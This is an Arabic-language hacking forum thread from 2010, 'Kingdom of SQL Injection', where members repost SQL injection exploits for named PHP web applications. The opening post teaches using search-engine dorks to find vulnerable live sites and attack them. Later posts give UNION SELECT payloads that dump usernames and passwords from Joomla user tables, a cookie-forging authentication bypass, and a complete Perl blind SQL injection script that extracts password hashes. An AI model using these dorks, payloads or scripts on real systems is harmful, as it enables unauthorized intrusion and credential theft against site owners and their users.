التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-05-2010, 04:39 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

.................... √مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--


[align=center]الـسـلام عـلـيكـم[/align]


::مملكة ثغرات حقن قواعد البيانات::
::متجدد بأذن الله::
-------------------------



البعض ما بيعرف يستغل الثغرات في مواقع السكيورتي المشهورة وممكن ما يستفيد منها اذا طرحتها هنا...
مع انو بيعرف يحقن لذلك اول ثغرة اقدمها راح اشرح عليها
نبدا على بركة الله



كود PHP:
Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection
#عنوان الثغرة وهو عادة يحتوي على اسم السكربت المصاب وايضا على نوع الثغرة#
2010-08-05
--تاريخ صدور الثغرة--

$الان هنا محتوى الثغرة$
####################################################################
.:. --اسم او لقب كاتب الثغرة--Author Metropolis
.:. Home www.metropolis.fr.cr --موقع الكاتب--
.:. --
السكربت المصاب-- Script Nuked-Klan Module Partenaires NK 1.5
.:. Version 1.5 --اصدار السكربت--

.:. 
Download Scripthttp://www.nuked-klan.org/index.php?file=Download&op=description&dl_id=317--هذا رابط تحميل السكربت وهو مش مهم الك--
.:. Bug Type Blind Sql Injection--نوع الثغرة وهنا نوعها بلايند سكول--
.:. 
Dork inurl:/modules/Partenaires/clic.php?id=
--
الدورك وهو الي راح تعملو نسخ ولصق باي محرك بحث والنتائج الي راح تطلع هي المواقع الماصبة--
####################################################################
Blind Sql Injection

SQL Error 
=>
--
كيفية ايجاد الخطا--

/
modules/Partenaires/clic.php?id=8
--هذا الرابط الخاص بايجاد الخطا--

www.site.com/modules/Partenaires/clic.php?id=8 [Blind]
--وهذا الاستغلال..يعني الان مثلا طلع احد المواقع المصابة هذا مثلا :
www.xxx.com
وهو طبعا معاه السكربت راح تضع بعد الرابط مثل الاستغلال :
/modules/Partenaires/clic.php?id=
بعد اليساوي ضع قيمة حسب الي يطلعلك بمحرك البحث وهاكذا مع كل المواقع...

#################################################################### 
الان هذا احد الامثلة ومع الشرح اما الثغرات القادمة راح تكون بدون شرح...
رجاء ارجو ان يكون الموضوع خاص بوضع الثغرات فقط وبدون ردود
تحياتي
Master vbspiders






√llg;m eyvhj prk r,hu] hgfdhkhj√--Kingdom Of Sql Injection--

التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-05-2010, 04:42 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية nabil987
 

 

 
إحصائية العضو







nabil987 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
nabil987 is on a distinguished road

افتراضي


لم افهم

التوقيع

http://narutomania333.n.a.pic.center...t/vipe2oro.jpg


لايوجد موقع يصعب على الجزائريينnabil.adoum@yahoo.fr

 

   

رد مع اقتباس
قديم 08-05-2010, 04:46 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة nabil987
لم افهم

[align=center]شو هو الي ما فهمتو اخي الكريم
هذا الموضوع هو عبارة عن اختصار في البحث عن السكربتت المصابة بثغرة السكول
وهنا انا اضع الثغرات الي فيها السكرببت المصابة والي راح تسهل عليك البحث عن المواقع الماصبة
هذا كل ما في الموضوع
وارجو عدم طرح ردود جانبية اخرى
هذا اخير تبليغ
تحياتي
[/align]
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-05-2010, 04:57 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post APT-WEBSHOP-SYSTEM modules.php SQL injection


كود PHP:
===============================================
APT-WEBSHOP-SYSTEM modules.php SQL injection
===============================================
 
  
____ ____ _____ ___   ____ ______   ____ ___   ___    _  __
  
__// __// ___// _ \ / __//_  __/  /  _// _ \ / _ |  / |/ /
 
_\ \ / _/ / /__ / , _// _/   / /    _/ / / , _// __ | /    /
/___//___/ \___//_/|_|/___/  /_/____/___//_/|_|/_/ |_|/_/|_/ 
                               
/___/                         
 
####################################################
# APT-WEBSHOP-SYSTEM modules.php SQL injection
####################################################
# Discovered by : secret
# Site          : http://swissfaking.net
# Dork          : powered by apt-webservice ;apt-webshop-system v3.0
# Vendor        : http://www.apt-ebusiness.com
 
# Exploit       : [site]/shop/modules.php?warp=artikel&group=x&seite=x&id=xxx(SQLINJECTION)
 
 
####################################################################################### 
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-05-2010, 04:58 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post Joomla CamelcityDB 2.2 SQL Injection Vulnerability


كود PHP:
view source
print?
==============================================================
Joomla Component (com_camelcitydb2SQL Injection Vulnerability
==============================================================
  
###########################
Title Joomla Component (com_camelcitydb2SQL Injection Vulnerability
Script 
Joomla CamelcityDB 2.2
Date 
02/08/2010
Author 
Amine_92
Tested 
All version
Home 
http://vbhacker.net
Dork inurl:"option=com_camelcitydb2"
contact amine92_16@hotmail.fr
########################### 
           
Vulnerable File ]
       
[
path]/index.php?option=com_camelcitydb2&view=all&Itemid=15
  
[SQL]:
  
/
index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
  
############################################################## 
Thank's to : All Hacker Mu$lim & Poeple of Gaza 
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-05-2010, 05:00 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post WordPress NextGEN Smooth Gallery Blind SQL Injection Vulnerability


كود PHP:
#############################################################################################################
## WordPress NextGEN Smooth Gallery BLIND SQL injection                                            ##
## Author : kaMtiEz (kamzcrew@yahoo.com)                                   ##
## Homepage : http://www.indonesiancoder.com                                           ##
## Date : 03 August, 2010                                                          ##
#############################################################################################################
 
Software Information ]
 
[+] 
Download http://downloads.wordpress.org/plugin/nextgen-smooth-gallery.1.2.zip
[+] version 1.2 or lower maybe also affected
[+] Vulnerability BLIND SQL
[+] Dork "CiHuY"
[+] LOCATION INDONESIA JOGJA
 
#############################################################################################################
 
Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=[VALID ID][BLIND-SQL]
 
DEMO ]
 
http://www.site.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=31[BLIND-SQL]
 
http://www.site.com/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=34[BLIND-SQL]
 
http://www.site.com/dp2009/wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=2[BLIND-SQL]
 
FIX ]
 
dunno :">
 
 
#############################################################################################################
 
[ Thx TO ]
 
[+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-,Hakz,pl4nkt0n
[+] Contrex,YadoY666,bumble_be,MarahMeraH,newbie_043,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212,anharku,isarock
 
 
[ NOTE ]
 
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] Menyambut kemerdekaan INDONESIA .. MERDEKA !!
[+] Selamat Menyambut datangnya bulan ramadhan :D
[+] sendiri di malam hari sambil merokok menikmati indahnya pagi ;)
 
[ QUOTE ]
 
[+] INDONESIANCODER still r0x
[+] nothing secure .. 
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-05-2010, 05:06 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية darkman.dz
 

 

 
إحصائية العضو








darkman.dz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darkman.dz is on a distinguished road

افتراضي


nabil987
أخي العزيز
الأخ أعلاه فقط شرح لك اللغة الإنجليزية
لايعقل أنك لا تفقه هاته اللغة و تريد التعلم أخي العزيز
لازم عليك تتعلم ولو بعض المبادئ منها
هاته نصيحة مني لك
--------------------------------------
Master vbspiders
مشكور على المباردة الحلوة و موضوع يستحق التثبيت و التقييم
أرجو تفاعل الجماعة

التوقيع

** اللهم اغفر لي ولوالدي كما ربياني صغيرا**

 

   

رد مع اقتباس
قديم 08-05-2010, 05:11 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة ooooo_darkman_ooooo
nabil987
أخي العزيز
الأخ أعلاه فقط شرح لك اللغة الإنجليزية
لايعقل أنك لا تفقه هاته اللغة و تريد التعلم أخي العزيز
لازم عليك تتعلم ولو بعض المبادئ منها
هاته نصيحة مني لك
--------------------------------------
Master vbspiders
مشكور على المباردة الحلوة و موضوع يستحق التثبيت و التقييم
أرجو تفاعل الجماعة

[align=center]شكرا على التوضيح ولا مانع اذا الاخوة شاركوني بوضع الثغرات...
تحياتي
[/align]
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-05-2010, 08:21 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
إحصائية العضو







عبد الله ر غير متواجد حالياً

إرسال رسالة عبر MSN إلى عبد الله ر

 

 

إحصائية الترشيح

عدد النقاط : 10
عبد الله ر is on a distinguished road

افتراضي


كود PHP:
TTVideo 1.0 Joomla Component SQL Injection Vulnerability
Download link
http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/
 
Name              TTVideo Vendor            http://www.toughtomato.com Versions Affected 1.0
 
Author            Salvatore Fresta aka Drosophila Website           http://www.salvatorefresta.net Contact           salvatorefresta [at] gmail [dot] com Date              2010-07-27
XINDEX
 I
.    ABOUT THE APPLICATION II.   DESCRIPTION III.  ANALYSIS IV.   SAMPLE CODE V.    FIX
I
ABOUT THE APPLICATION________________________
TTVideo  is  a  Joomla
!  component that makes use of thepopular  video  sharing  site  Vimeo  to  create a videolibrary.
IIDESCRIPTION_______________
A  parameter  in  ttvideo
.php  is not properly sanitisedbefore being used in a SQL query.
IIIANALYSIS_____________
Summary
:
 
ASQL Injection
A
SQL Injection________________
The parameter cid passed to ttvideo
.php when task is setto video  is not properly sanitised before being used ina SQL query.  This  can  be  exploited to manipulate SQLqueries by injecting arbitrary SQL code.  The  followingis the vulnerable code:
ttvideoController.php (line 40):
function 
video() {    $cid JRequest::getVar('cid'null'default');
ttvideo.php (line 188):
function 
getVideo($id) {    $db $this->getDBO();    $db->setQuery("SELECT * from #__ttvideo WHERE id=$id");    $video $db->loadObject();     if ($video === null)      JError::raiseError(500'Video with ID: '.$id.' not found.');    return $video;}IVSAMPLE CODE_______________
A
SQL Injection
http
://site/path/index.php?option=com_ttvideo&task=video&cid=-1  UNION SELECT  1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17  FROM jos_users
VFIX______
Use JRequest::getInt instead of JRequest::getVar 
التوقيع

سبحان الله وبحمده سبحان الله العظيم
في الطريق الى الاحتراف
باذن الله
أن تكون سوريا" يعني أن تكون أسدا" تحيط به الضباع

 

   

رد مع اقتباس
قديم 08-05-2010, 08:23 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
إحصائية العضو







عبد الله ر غير متواجد حالياً

إرسال رسالة عبر MSN إلى عبد الله ر

 

 

إحصائية الترشيح

عدد النقاط : 10
عبد الله ر is on a distinguished road

افتراضي


كود PHP:
 -----------------------------------------------------------------------------------------Freeway 

CMS 1.4.3.210 SQL Injection Vulnerability
-----------------------------------------------------------------------------------------  

[+]
Title              Freeway CMS 1.4.3.210 SQL Injection  Vulnerability[+]Author          **RoAd_KiLlEr**[+]Contact         RoAd_KiLlEr[at]Khg-Crew[dot]Ws[+]Tested on     Win Xp Sp  2/3---------------------------------------------------------------------------[~]

 
Founded by **RoAd_KiLlEr**[~] TeamAlbanian Hacking Crew[~]

 
Contact:  RoAd_KiLlEr[at]Khg-Crew[dot]Ws [~] Homehttp://inj3ct0r.com[~] Vendor:  http://www.openfreeway.org[~] 

Download:  http://internode.dl.sourceforge.net/sourceforge/freeway-ecom/freeway_1_3_4_210.tar.gz[~]  Version:1.4.3.210[~]

 
Price Free==========ExPl0iT3d by  **RoAd_KiLlEr**==========[+]  

DescriptionFreeway is the most advanced  Open Source eCommerce  platform and includes an array of features not  found in extremely  expensive commercial systemsWithout having to  purchase a commercial  system and then paying a developer to build  custom installationFreeway  does most of what you need out of the box.  For exampleinstead of  getting dragged into purchasing an overpriced  products based system and  having a developer struggle for weeks and  eventually fail to force  products sales into event salesFreeway  already support events AND  services AND  subscriptions.
========================================== [+]

 
DorkNo  DoRks For Script Kiddies ========================================== [ I  ].

  
SQL Vulnerability=+=+=+=+=+=+=+=+=+ [P0C]

  
http://127.0.0.1/path/index.php?ecPath=[SQL Injection]

 
[L!v3 D3m0]:  http://www.site.com/register/index.php?ecPath='3

 
And we Got:  1054 -  Unknown column 'e.events_status' in 'where clause' select  events_id,  events_image from events where

 
(e.events_status=or (   e.events_status=and e.sessions_start_date>=curdate()) or   (e.events_status>=and e.sessions_end_date>=curdate())) and   date_format(e.events_date_available,'%Y-%m-%d')<=curdate() order by   events_date_added desc limit 4 Now you will be doing the Rest :PGood  Luck   ===========================================================================================[!]

 
Albanian Hacking Crew            ===========================================================================================[!]

 **
RoAd_KiLlEr**    ===========================================================================================[!] 

MaiL:  sukihack[at]gmail[dot]com===========================================================================================[!] 

  
Greetz To Ton![w]indowS X-n3t b4cKd00r ~ | DarKHackeR. |   The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All   Albanian/Kosova Hackers  ===========================================================================================[!]

 Spec Th4nks:  r0073r  | indoushka from Dz-Ghost Team  | MaFFiTeRRoR |  All  Inj3ct0r 31337 Members | And All My  Friendz===========================================================================================[!]

 Red n'black i dress eagle on my chestIt's good to be an
 ALBANIANKeep my  head up high for that flag I dieIm proud to be an  ALBANIAN=========================================================================================== 
التوقيع

سبحان الله وبحمده سبحان الله العظيم
في الطريق الى الاحتراف
باذن الله
أن تكون سوريا" يعني أن تكون أسدا" تحيط به الضباع

 


التعديل الأخير تم بواسطة عبد الله ر ; 08-05-2010 الساعة 08:31 PM.

   

رد مع اقتباس
قديم 08-05-2010, 08:59 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post AV Arcade v3 ****** SQL Injection Authentication Bypass


[PHP]:----------------------------------------------------------------------------:
: # Software : AV Arcade v3

كود PHP:
                                     :
# Site          : www.avscripts.net                                        :
# Date          : 28/07/2010                                               :
# Author        : saudi0hacker                                             :
# Type          : Auth Bypass / ******                                     :
# Greetz to     : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:
 
[
1Go to the URL:
    
http://www.xxxxx.net/index.php?task=login
 
[2Apply these ******:
 
    
Javascript:********.****** = "ava_username=admin;"
    
Javascript:********.****** = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"
 
[3Go to main Page:
 
[
4Enjoy 
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-05-2010, 09:02 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post PunBB <= 1.3.4 and Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit


كود PHP:
#!/usr/bin/perl
# [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
# Author/s: Dante90, WaRWolFz Crew
# Created: 2009.07.30 after 0 days the bug was discovered.
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat
# Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_,
#               Chuzz, init, plucky, SaRtE, Lupo
# Thanks For Testing: BlAcK HaT, l3d
# Web Site: www.warwolfz.org
# My Wagend (Dante90): dante90wwz.altervista.org
# Unit-X Project: www.unitx.net
# ----
# Why I've decided to publish this?
# Because in "Package: Pun_PM <= v1.2.9" the bug was fixed.
# ----
# DETAILS
# ./PunBB v1.3.*/extensions/pun_pm/functions.php
# LINES: 504 -> 526
#   function pun_pm_edit_message()
#   {
#       global $forum_db, $forum_user, $lang_pun_pm;
#
#       $errors = array();
#
#       // Verify input data
#       $query = array(
#           'SELECT'    => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
#           'FROM'      => 'pun_pm_messages m',
#           'JOINS'     => array(
#               array(
#                   'LEFT JOIN'     => 'users AS u',
#                   'ON'            => '(u.id = m.receiver_id)'
#               ),
#           ),
#           'WHERE'     => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
#       );
#
#       ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;
#
#       $result = $forum_db->query_build($query) or error(__FILE__, __LINE__);
# ----
# GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
# Error - PunBB
# An error was encountered
# The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
# Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).
 
use strict;
use 
warnings;
 
use 
LWP::UserAgent;
use 
HTTP::******s;
use 
HTTP::Request::Common;
use 
Time::HiRes;
use 
IO::Socket;
 
my ($UserName,$PassWord,$ID) = @ARGV;
if (@
ARGV 3) {
    &
usage();
    exit();
}
 
my $Message "";
my $Hash "";
my ($Time,$Time_Start,$Time_End,$Response);
my ($Start,$End);
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
my $Host "http://www.victime_site.org/path/"#Insert Victime Web Site Link
my $Method HTTP::Request->new(GET => $Host);
my $******= new HTTP::******s;
my $HTTP = new LWP::UserAgent(
            
agent => 'Mozilla/5.0',
            
max_redirect => 0,
            ******
_jar => $******s,
        ) or die $!;
my $Referrer "http://www.warwolfz.org/";
my $DefaultTime request($Referrer);
 
sub request {
    
$Referrer $_[0];
    
$Method->referrer($Referrer);
    
$Start Time::HiRes::time();
    
$Response $HTTP->request($Method);
    
$Response->is_success() or die "$Host : "$Response->message,"\n";
    
$End Time::HiRes::time();
    
$Time $End $Start;
    return 
$Time;
}
 
sub Blind_SQL_Jnjection {
    
my ($dec,$hex) = @_;
    return 
"./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
}
 
sub Clear() {
    
my $launch = $^O eq 'MSWin32' 'cls' 'clear';
    return 
system($launch);
}
 
sub Login() {
    if (
$ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
        $******
s->proxy(['http''ftp'], 'http://'.$ARGV[4]) or die $!;
    }
    
my $Get $HTTP->get($Host.'login.php');
    
my $csrf_token "";
    if (
$Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
        
$csrf_token = $1;
    }
    my 
$Login = $HTTP->post($Host.'login.php',
                [
                    form_sent       => '1',
                    redirect_url    => 
$Host.'login.php',
                    csrf_token      => 
$csrf_token,
                    req_username    => 
$UserName,
                    req_password    => 
$PassWord,
                    save_pass       => '1',
                    login => 'Login',
                ]) || die $!;
 
    if (
$Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second.
        return 1;
    } else {
        return 0;
    }
}
 
sub usage {
    Clear();
    {
        print " 
\[0-DayPunBB <= 1.3.4 PackagePun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
        print " 
------------------------------------------------------ \n";
        print " 
USAGE:                                             *\n";
        print " 
cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
        print " 
perl name_exploit.pl [username] [password] [id]    *\n";
        print " 
* [proxyis optional (ex151.57.4.97:8080)         *\n";
        print " 
------------------------------------------------------ \n";
        print " 
*         Powered By Dante90WaRWolFz Crew          *\n";
        print " 
www.warwolfz.org dante90_founder[at]warwolfz.org *\n";
        print " 
------------------------------------------------------ \n";
    };
    exit;
}
 
sub ******* {
    Clear();
    {
        print " 
\[0-DayPunBB <= 1.3.4 PackagePun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
        print " 
------------------------------------------------------ \n";
        print " 
USAGE:                                             *\n";
        print " 
cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
        print " 
perl name_exploit.pl [username] [password] [id]    *\n";
        print " 
* [proxyis optional (ex151.57.4.97:8080)         *\n";
        print " 
------------------------------------------------------ \n";
        print " 
*         Powered By Dante90WaRWolFz Crew          *\n";
        print " 
www.warwolfz.org dante90_founder[at]warwolfz.org *\n";
        print " 
------------------------------------------------------ \n";
    };
    print 
$_[0] ."\n";
    print " 
Victime Site" . $_[1] . "\n";
    print " 
* Default Time" . $_[2] . " seconds\n";
    print " 
BruteForcing Hash" . chr($chars[$_[3]]) . "\n";
    print " 
BruteForcing N Char Hash" . $_[6] . "\n";
    print " 
SQL Time" . $_[5] . " seconds\n";
    print " 
Hash" . $_[4] . "\n";
}
 
sub Main(){
    if (Login() == 1) {
        
$Message = " Logged in as: ".$UserName;
    } elsif (Login() == 0) {
        
$Message = " Login Failed.";
        *******(
$Message$Host$DefaultTime, "0", $Hash$Time, "1");
        print " 
Exploit Failed                                     *\n";
        print " 
------------------------------------------------------ \n";
        exit;
    }
    for (my 
$I=1; $I<=40; $I++) { #N Hash characters
        for (my 
$J=0; $J<=15; $J++) { #0 -> F
            
$Time_Start = time();
            my 
$Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
            
$Time_End = time();
            
$Time = request($Referrer);
            *******(
$Message$Host$DefaultTime$J$Hash$Time$I);
            if (
$Time_End - $Time_Start > 6) {
                
$Time = request($Referrer);
                *******(
$Message$Host$DefaultTime$J$Hash$Time$I);
                if (
$Time_End - $Time_Start > 6) {
                    syswrite(STDOUT,chr(
$chars[$J]));
                    
$Hash .= chr($chars[$J]);
                    
$Time = request($Referrer);
                    *******(
$Message$Host$DefaultTime$J$Hash$Time$I);
                    last;
                }
            }
        }
        if (
$I == 1 && length $Hash < 1 && !$Hash) {
            print " 
Exploit Failed                                     *\n";
            print " 
------------------------------------------------------ \n";
            exit;
        }
        if (
$I == 40) {
            print " 
Exploit Successfully Executed                      *\n";
            print " 
------------------------------------------------------\";
            system("
pause");
        }
    }
}
 
Main();
 
#WaRWolFz Crew 
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-05-2010, 09:05 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post Freeway CMS 1.4.3.210 SQL Injection Vulnerability


كود PHP:
-----------------------------------------------------------------------------------------
Freeway CMS 1.4.3.210 SQL Injection Vulnerability
-----------------------------------------------------------------------------------------
 
[+]
Title              Freeway CMS 1.4.3.210 SQL Injection Vulnerability
[+]Author          **RoAd_KiLlEr**
[+]
Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] 
Founded by **RoAd_KiLlEr**
[~] 
TeamAlbanian Hacking Crew
[~] ContactRoAd_KiLlEr[at]Khg-Crew[dot]Ws
[~] Homehttp://inj3ct0r.com
[~] Vendorhttp://www.openfreeway.org
[~] Downloadhttp://internode.dl.sourceforge.net/sourceforge/freeway-ecom/freeway_1_3_4_210.tar.gz
[~] Version:1.4.3.210
[~] Price Free
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+] 
DescriptionFreeway is the most advanced Open Source eCommerce platform and includes an array of features not found in extremely expensive commercial systemsWithout having to purchase a commercial system and then paying a developer to build custom installationFreeway does most of what you need out of the box. For exampleinstead of getting dragged into purchasing an overpriced products based system and having a developer struggle for weeks and eventually fail to force products sales into event salesFreeway already support events AND services AND subscriptions.
==========================================
 
[+] 
DorkNo DoRks For Script Kiddies
 
==========================================
 
].  SQL Vulnerability
=+=+=+=+=+=+=+=+=+
 
[
P0C]:  http://127.0.0.1/path/index.php?ecPath=[SQL Injection]
 
[L!v3 D3m0]: http://www.site.com/register/index.php?ecPath='3
 
And we Got:  1054 Unknown column 'e.events_status' in 'where clause'
 
select events_idevents_image from events where (e.events_status=or ( e.events_status=and e.sessions_start_date>=curdate()) or (e.events_status>=and e.sessions_end_date>=curdate())) and date_format(e.events_date_available,'%Y-%m-%d')<=curdate() order by events_date_added desc limit 4
 
Now you will be doing the Rest 
:PGood Luck
 
===========================================================================================
[!] 
Albanian Hacking Crew          
===========================================================================================
[!] **
RoAd_KiLlEr**  
===========================================================================================
[!] 
MaiLsukihack[at]gmail[dot]com
===========================================================================================
[!] 
Greetz To Ton![w]indowS X-n3t b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks:  r0073r  | indoushka from Dz-Ghost Team  | MaFFiTeRRoR | All  Inj3ct0r 31337 Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
=========================================================================================== 
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-06-2010, 04:25 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post APBoard v2.1.0 ( board.php?id=) SQL Injection Vulnerability


كود PHP:
#############################################################################################################
## APBoard 2.1.0  / board.php?id= SQL Injection                                           ##
## Author         : secret - mohammed.atta@hotmail.com                                   ##
## Homepage       : http://swissfaking.net/                                             ##
## Date           : 05 August, 2010                                                    ##
#############################################################################################################
  
____ ____ _____ ___   ____ ______   ____ ___   ___    _  __
  
__// __// ___// _ \ / __//_  __/  /  _// _ \ / _ |  / |/ /
 
_\ \ / _/ / /__ / , _// _/   / /    _/ / / , _// __ | /    /
/___//___/ \___//_/|_|/___/  /_/____/___//_/|_|/_/ |_|/_/|_/ 
                               
/___/                          
   
####################################################
# APBoard 2.1.0  / board.php?id= SQL Injection
####################################################
# Discovered by : secret
# Site          : http://swissfaking.net/
# Dork          : APBoard 2.1.0 © 2003-2010 APP - Another PHP Program
# Vendor        : http://www.php-programs.de/
# Version       : 2.1.0 and earlier
# Exploit       : http://www.yoursite.de/board/board.php?id=X[SQL INJECTION]
# Tested on     : Microsoft OS
   
e.ghttp://server/board/board.php?id=6[get union columns&USERS'] (-sqlinjection)
    
########################################################################################
   
#note : IRAN owns - mohammed.atta@hotmail.com 
التوقيع

^_^



 

   

رد مع اقتباس
قديم 08-06-2010, 04:27 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

Post sX-Shop Multiple SQL Injection Vulnerabilities


كود PHP:
########################################################################################
 
sX-Shop SQL Injection Vulnerabilities
 
########################################################################################
 
Author CoBRa_21
Author Web Page 
:http://ipbul.org
Dork "powered by sX-Shop"
Script Page http://www.source-worx.de/
 
########################################################################################
  
Sql Injection :
 
http://localhost/[path]/index.php?product=_513' (Sql)
